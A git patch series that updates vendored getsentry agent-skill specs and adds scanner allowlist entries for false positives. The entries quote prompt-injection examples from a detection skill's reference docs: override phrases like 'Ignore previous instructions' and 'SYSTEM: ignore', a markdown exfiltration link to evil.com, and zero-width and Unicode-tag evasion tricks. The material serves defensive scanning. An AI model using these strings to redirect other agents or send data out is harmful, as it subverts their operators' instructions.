From 3761585c32995267540a48646fca1bd8449cd8d9 Mon Sep 17 00:00:00 2001 From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com> Date: Fri, 3 Jul 2026 10:17:38 +0000 Subject: [PATCH 1/4] chore(deps): update getsentry/skills digest to 5a64b36 --- skills/agents-md/spec.yaml | 2 +- skills/claude-settings-audit/spec.yaml | 2 +- skills/code-review/spec.yaml | 2 +- skills/code-simplifier/spec.yaml | 2 +- skills/commit/spec.yaml | 2 +- skills/create-branch/spec.yaml | 2 +- skills/django-access-review/spec.yaml | 2 +- skills/django-perf-review/spec.yaml | 2 +- skills/doc-coauthoring/spec.yaml | 2 +- skills/find-bugs/spec.yaml | 2 +- skills/gh-review-requests/spec.yaml | 2 +- skills/gha-security-review/spec.yaml | 2 +- skills/iterate-pr/spec.yaml | 2 +- skills/pr-writer/spec.yaml | 2 +- skills/prompt-optimizer/spec.yaml | 2 +- skills/security-review/spec.yaml | 2 +- skills/skill-scanner/spec.yaml | 2 +- skills/skill-writer/spec.yaml | 2 +- 18 files changed, 18 insertions(+), 18 deletions(-) diff --git a/skills/agents-md/spec.yaml b/skills/agents-md/spec.yaml index 31510613..c0d3ac8d 100644 --- a/skills/agents-md/spec.yaml +++ b/skills/agents-md/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/agents-md" version: "0.1.1" diff --git a/skills/claude-settings-audit/spec.yaml b/skills/claude-settings-audit/spec.yaml index b9ebd834..2c21190a 100644 --- a/skills/claude-settings-audit/spec.yaml +++ b/skills/claude-settings-audit/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/claude-settings-audit" version: "0.1.1" diff --git a/skills/code-review/spec.yaml b/skills/code-review/spec.yaml index 637a0e29..0e29ccca 100644 --- a/skills/code-review/spec.yaml +++ b/skills/code-review/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/code-review" version: "0.1.1" diff --git a/skills/code-simplifier/spec.yaml b/skills/code-simplifier/spec.yaml index e5458232..1c137812 100644 --- a/skills/code-simplifier/spec.yaml +++ b/skills/code-simplifier/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/code-simplifier" version: "0.1.1" diff --git a/skills/commit/spec.yaml b/skills/commit/spec.yaml index 044ad4c7..d2401570 100644 --- a/skills/commit/spec.yaml +++ b/skills/commit/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/commit" version: "0.1.1" diff --git a/skills/create-branch/spec.yaml b/skills/create-branch/spec.yaml index c9eaeda3..37df86fd 100644 --- a/skills/create-branch/spec.yaml +++ b/skills/create-branch/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/create-branch" version: "0.1.1" diff --git a/skills/django-access-review/spec.yaml b/skills/django-access-review/spec.yaml index 2d284da0..cba6169d 100644 --- a/skills/django-access-review/spec.yaml +++ b/skills/django-access-review/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/django-access-review" version: "0.1.1" diff --git a/skills/django-perf-review/spec.yaml b/skills/django-perf-review/spec.yaml index 119d290f..db27b21a 100644 --- a/skills/django-perf-review/spec.yaml +++ b/skills/django-perf-review/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/django-perf-review" version: "0.1.1" diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml index c633137d..368ea702 100644 --- a/skills/doc-coauthoring/spec.yaml +++ b/skills/doc-coauthoring/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/doc-coauthoring" version: "0.1.1" diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml index 02689916..e07c1d32 100644 --- a/skills/find-bugs/spec.yaml +++ b/skills/find-bugs/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/find-bugs" version: "0.1.1" diff --git a/skills/gh-review-requests/spec.yaml b/skills/gh-review-requests/spec.yaml index f5e0ac20..d8bfeb00 100644 --- a/skills/gh-review-requests/spec.yaml +++ b/skills/gh-review-requests/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/gh-review-requests" version: "0.1.1" diff --git a/skills/gha-security-review/spec.yaml b/skills/gha-security-review/spec.yaml index 134b6629..38461eb8 100644 --- a/skills/gha-security-review/spec.yaml +++ b/skills/gha-security-review/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/gha-security-review" version: "0.1.1" diff --git a/skills/iterate-pr/spec.yaml b/skills/iterate-pr/spec.yaml index 07af44f0..bdad93bb 100644 --- a/skills/iterate-pr/spec.yaml +++ b/skills/iterate-pr/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/iterate-pr" version: "0.1.1" diff --git a/skills/pr-writer/spec.yaml b/skills/pr-writer/spec.yaml index eae606f7..db0220ce 100644 --- a/skills/pr-writer/spec.yaml +++ b/skills/pr-writer/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/pr-writer" version: "0.1.1" diff --git a/skills/prompt-optimizer/spec.yaml b/skills/prompt-optimizer/spec.yaml index 8a457a2b..e9ab1b87 100644 --- a/skills/prompt-optimizer/spec.yaml +++ b/skills/prompt-optimizer/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/prompt-optimizer" version: "0.1.1" diff --git a/skills/security-review/spec.yaml b/skills/security-review/spec.yaml index 681d5cea..b23d5c87 100644 --- a/skills/security-review/spec.yaml +++ b/skills/security-review/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/security-review" version: "0.1.1" diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml index b914507c..93bc2960 100644 --- a/skills/skill-scanner/spec.yaml +++ b/skills/skill-scanner/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/skill-scanner" version: "0.1.1" diff --git a/skills/skill-writer/spec.yaml b/skills/skill-writer/spec.yaml index b4300c77..348bc4e9 100644 --- a/skills/skill-writer/spec.yaml +++ b/skills/skill-writer/spec.yaml @@ -9,7 +9,7 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/skill-writer" version: "0.1.1" From b5a051ac2d2d14c80ca1d024a4f5b4cc12ccb1d4 Mon Sep 17 00:00:00 2001 From: "toolhive-release-app[bot]" <280093410+toolhive-release-app[bot]@users.noreply.github.com> Date: Fri, 3 Jul 2026 10:18:37 +0000 Subject: [PATCH 2/4] chore(skills): bump spec.version for agents-md,claude-settings-audit,code-review,code-simplifier,commit,create-branch,django-access-review,django-perf-review,doc-coauthoring,find-bugs,gh-review-requests,gha-security-review,iterate-pr,pr-writer,prompt-optimizer,security-review,skill-scanner,skill-writer --- skills/agents-md/spec.yaml | 2 +- skills/claude-settings-audit/spec.yaml | 2 +- skills/code-review/spec.yaml | 2 +- skills/code-simplifier/spec.yaml | 2 +- skills/commit/spec.yaml | 2 +- skills/create-branch/spec.yaml | 2 +- skills/django-access-review/spec.yaml | 2 +- skills/django-perf-review/spec.yaml | 2 +- skills/doc-coauthoring/spec.yaml | 2 +- skills/find-bugs/spec.yaml | 2 +- skills/gh-review-requests/spec.yaml | 2 +- skills/gha-security-review/spec.yaml | 2 +- skills/iterate-pr/spec.yaml | 2 +- skills/pr-writer/spec.yaml | 2 +- skills/prompt-optimizer/spec.yaml | 2 +- skills/security-review/spec.yaml | 2 +- skills/skill-scanner/spec.yaml | 2 +- skills/skill-writer/spec.yaml | 2 +- 18 files changed, 18 insertions(+), 18 deletions(-) diff --git a/skills/agents-md/spec.yaml b/skills/agents-md/spec.yaml index c0d3ac8d..a36a46c0 100644 --- a/skills/agents-md/spec.yaml +++ b/skills/agents-md/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/agents-md" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/claude-settings-audit/spec.yaml b/skills/claude-settings-audit/spec.yaml index 2c21190a..bd01450e 100644 --- a/skills/claude-settings-audit/spec.yaml +++ b/skills/claude-settings-audit/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/claude-settings-audit" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/code-review/spec.yaml b/skills/code-review/spec.yaml index 0e29ccca..796e0fb3 100644 --- a/skills/code-review/spec.yaml +++ b/skills/code-review/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/code-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/code-simplifier/spec.yaml b/skills/code-simplifier/spec.yaml index 1c137812..bed17975 100644 --- a/skills/code-simplifier/spec.yaml +++ b/skills/code-simplifier/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/code-simplifier" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/commit/spec.yaml b/skills/commit/spec.yaml index d2401570..8ca76c2f 100644 --- a/skills/commit/spec.yaml +++ b/skills/commit/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/commit" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/create-branch/spec.yaml b/skills/create-branch/spec.yaml index 37df86fd..0c858dcc 100644 --- a/skills/create-branch/spec.yaml +++ b/skills/create-branch/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/create-branch" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/django-access-review/spec.yaml b/skills/django-access-review/spec.yaml index cba6169d..0a022cb6 100644 --- a/skills/django-access-review/spec.yaml +++ b/skills/django-access-review/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/django-access-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/django-perf-review/spec.yaml b/skills/django-perf-review/spec.yaml index db27b21a..a846aa1f 100644 --- a/skills/django-perf-review/spec.yaml +++ b/skills/django-perf-review/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/django-perf-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml index 368ea702..d2e677c6 100644 --- a/skills/doc-coauthoring/spec.yaml +++ b/skills/doc-coauthoring/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/doc-coauthoring" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml index e07c1d32..d3f3daf8 100644 --- a/skills/find-bugs/spec.yaml +++ b/skills/find-bugs/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/find-bugs" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/gh-review-requests/spec.yaml b/skills/gh-review-requests/spec.yaml index d8bfeb00..041fb068 100644 --- a/skills/gh-review-requests/spec.yaml +++ b/skills/gh-review-requests/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/gh-review-requests" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/gha-security-review/spec.yaml b/skills/gha-security-review/spec.yaml index 38461eb8..0e16eec9 100644 --- a/skills/gha-security-review/spec.yaml +++ b/skills/gha-security-review/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/gha-security-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/iterate-pr/spec.yaml b/skills/iterate-pr/spec.yaml index bdad93bb..98f485eb 100644 --- a/skills/iterate-pr/spec.yaml +++ b/skills/iterate-pr/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/iterate-pr" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/pr-writer/spec.yaml b/skills/pr-writer/spec.yaml index db0220ce..ca2b93ff 100644 --- a/skills/pr-writer/spec.yaml +++ b/skills/pr-writer/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/pr-writer" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/prompt-optimizer/spec.yaml b/skills/prompt-optimizer/spec.yaml index e9ab1b87..fb5c944b 100644 --- a/skills/prompt-optimizer/spec.yaml +++ b/skills/prompt-optimizer/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/prompt-optimizer" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/security-review/spec.yaml b/skills/security-review/spec.yaml index b23d5c87..cbb3eea4 100644 --- a/skills/security-review/spec.yaml +++ b/skills/security-review/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/security-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml index 93bc2960..83ab4dc6 100644 --- a/skills/skill-scanner/spec.yaml +++ b/skills/skill-scanner/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/skill-scanner" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/skill-writer/spec.yaml b/skills/skill-writer/spec.yaml index 348bc4e9..7ac4e861 100644 --- a/skills/skill-writer/spec.yaml +++ b/skills/skill-writer/spec.yaml @@ -11,7 +11,7 @@ spec: repository: "https://github.com/getsentry/skills" ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/skill-writer" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" From d40abd0950c79c3199a841298c585c2b223a10ab Mon Sep 17 00:00:00 2001 From: Juan Antonio Osorio Date: Fri, 3 Jul 2026 13:42:46 +0300 Subject: [PATCH 3/4] fix(skills): allowlist FPs for doc-coauthoring, find-bugs, skill-scanner - doc-coauthoring: ATR_2026_00051 matched "For each" in a workflow step description, plain prose. - find-bugs: ATR_2026_00111 is the scanner's new numbered id for the same finding already allowlisted under the old named id ATR_MCP_MALICIOUS_RESPONSE (a read-only gh/git command substitution). - skill-scanner: ATR_2026_00276 matched an actual zero-width-space character used as a worked example in the skill's own prompt-injection-pattern reference docs -- same "meta-skill documents attack patterns for detection" class as its existing allowlist entries. Note: gha-security-review (36 blocking findings, 8 distinct rule ids) and skill-writer (176 blocking findings, 10 distinct rule ids) in this same digest bump are NOT fixed here -- high volume in security-review domain content, flagged for human review rather than bulk-allowlisted. Co-Authored-By: Claude Sonnet 5 --- skills/doc-coauthoring/spec.yaml | 5 +++++ skills/find-bugs/spec.yaml | 5 +++++ skills/skill-scanner/spec.yaml | 7 +++++++ 3 files changed, 17 insertions(+) diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml index d2e677c6..a570114e 100644 --- a/skills/doc-coauthoring/spec.yaml +++ b/skills/doc-coauthoring/spec.yaml @@ -21,3 +21,8 @@ security: allowed_issues: - rule_id: MANIFEST_MISSING_LICENSE reason: "getsentry/skills is licensed Apache-2.0 at the repository root; upstream does not embed an SPDX license identifier in per-skill SKILL.md frontmatter." + # FP: ATR_2026_00051 pattern-matches "For each" in SKILL.md's Step 2 + # (Test with Sub-Agent) — plain prose describing iterating reader questions + # through a fresh sub-agent, no executable content. + - rule_id: ATR_2026_00051 + reason: "FP: cisco-ai-skill-scanner matched the prose phrase 'For each' in SKILL.md (Step 2: Test with Sub-Agent, 'For each question, invoke a sub-agent...'). Plain workflow documentation, no executable threat." diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml index d3f3daf8..4f2755cf 100644 --- a/skills/find-bugs/spec.yaml +++ b/skills/find-bugs/spec.yaml @@ -30,3 +30,8 @@ security: the command is hard-coded skill content (not attacker-controlled) and uses only read-only tools (`git diff`, `gh repo view`). Verified at digest 5cfc9e22a91c2d3a230c4d5154ea0f1babce3b28. + # The scanner now emits this same finding under a numbered ATR_2026_* id + # instead of the named rule above (rule-id scheme changed upstream in the + # scanner tooling) -- same command, same justification, re-verified at 5a64b36. + - rule_id: ATR_2026_00111 + reason: "FP: same finding as ATR_MCP_MALICIOUS_RESPONSE above -- the scanner's rule_id naming changed from named (ATR_MCP_*) to numbered (ATR_2026_*) ids. Matched $(gh repo view --json defaultBranchRef --jq '.defaultBranchRef.name') (SKILL.md:7), a read-only command substitution for diff-scoping. Re-verified at getsentry/skills @5a64b36." diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml index 83ab4dc6..5a177619 100644 --- a/skills/skill-scanner/spec.yaml +++ b/skills/skill-scanner/spec.yaml @@ -27,3 +27,10 @@ security: reason: "The skill's reference material on prompt-injection patterns cites 'Enter developer mode' as an example jailbreak pattern the skill teaches to detect. Documenting the pattern is the skill's purpose." - rule_id: YARA_prompt_injection_unicode_steganography reason: "The skill documents invisible Unicode steganography (`\\U000e0001` tag characters) as a prompt-injection vector. Describing the attack class is required for the skill to teach detection of it." + # Same "meta-skill documents attack patterns for detection" class as the + # three rules above -- references/prompt-injection-patterns.md contains an + # actual zero-width-space character (U+200B) as a worked example of the + # "split keywords to evade pattern matching" evasion technique it teaches + # the scanner to detect. + - rule_id: ATR_2026_00276 + reason: "FP: this meta-skill's reference doc on prompt-injection patterns (references/prompt-injection-patterns.md) includes an actual zero-width-space character as a worked example of the 'Zero-Width Characters' evasion technique it documents. Teaching the detection pattern requires an example of the pattern; not an injection attempt against this skill itself." From e454b8c5ae7193124e6e66344eba4b99a6db1d33 Mon Sep 17 00:00:00 2001 From: Juan Antonio Osorio Date: Fri, 3 Jul 2026 14:19:14 +0300 Subject: [PATCH 4/4] fix(skills): batch-allowlist prompt-injection-patterns.md FPs in skill-scanner The scanner's non-determinism kept surfacing a different subset of this 153-line reference doc's documented attack-example strings on each re-scan (Ignore previous instructions, SYSTEM: ignore, jailbreak examples, exfil, etc.). Upstream's own file includes a "False Positive Guide" explicitly stating patterns in references/ files are documentation, not attacks. Allowlisting the full observed rule_id set at once rather than whack-a-moling one at a time. Co-Authored-By: Claude Sonnet 5 --- skills/skill-scanner/spec.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml index 5a177619..b0851f72 100644 --- a/skills/skill-scanner/spec.yaml +++ b/skills/skill-scanner/spec.yaml @@ -34,3 +34,32 @@ security: # the scanner to detect. - rule_id: ATR_2026_00276 reason: "FP: this meta-skill's reference doc on prompt-injection patterns (references/prompt-injection-patterns.md) includes an actual zero-width-space character as a worked example of the 'Zero-Width Characters' evasion technique it documents. Teaching the detection pattern requires an example of the pattern; not an injection attempt against this skill itself." + # references/prompt-injection-patterns.md (153 lines total) is entirely a + # catalog of documented injection/jailbreak example strings for this + # meta-skill to teach detection of -- upstream's own "False Positive Guide" + # section in the same file states: "Security skills are not malicious for + # discussing injection patterns" and "Patterns in references/ files are + # almost always documentation." The scanner's non-deterministic meta-analysis + # surfaces a different subset of this same short, bounded file's example + # strings ("Ignore previous instructions", "SYSTEM: ignore", jailbreak + # examples, "exfil", etc.) on each re-scan. Allowlisting the full set of + # rule_ids observed across multiple scans of this file to stop the + # whack-a-mole, rather than one at a time. getsentry/skills @5a64b36. + - rule_id: ATR_2026_00004 + reason: "FP: matched '### Instruction' / 'SYSTEM: ignore' headers in references/prompt-injection-patterns.md's catalog of documented injection example strings. See file-level note above." + - rule_id: ATR_2026_00010 + reason: "FP: matched backtick-wrapped fragments in references/prompt-injection-patterns.md's documentation tables. See file-level note above." + - rule_id: ATR_2026_00063 + reason: "FP: matched 'exfil' in references/prompt-injection-patterns.md's documented exfiltration-vector examples (e.g. `[](https://evil.com/exfil?data=...)`). See file-level note above." + - rule_id: ATR_2026_00095 + reason: "FP: matched 'ignore previous instructions' as a documented example string (repeated across the Instruction Override / Hidden Content Vectors tables) in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00111 + reason: "FP: matched '`cat -v`' (a documented detection command for Unicode tag-character steganography) in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00128 + reason: "FP: matched the documented HTML-comment injection example '' in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00213 + reason: "FP: matched 'Ignore previous instructions' as a documented example string in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00265 + reason: "FP: matched 'ignore previous instructions' as a documented example string in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: YARA_jailbreak_generic + reason: "FP: matched the word 'example'/'Example' inside the Jailbreak Patterns section's own worked examples in references/prompt-injection-patterns.md. See file-level note above."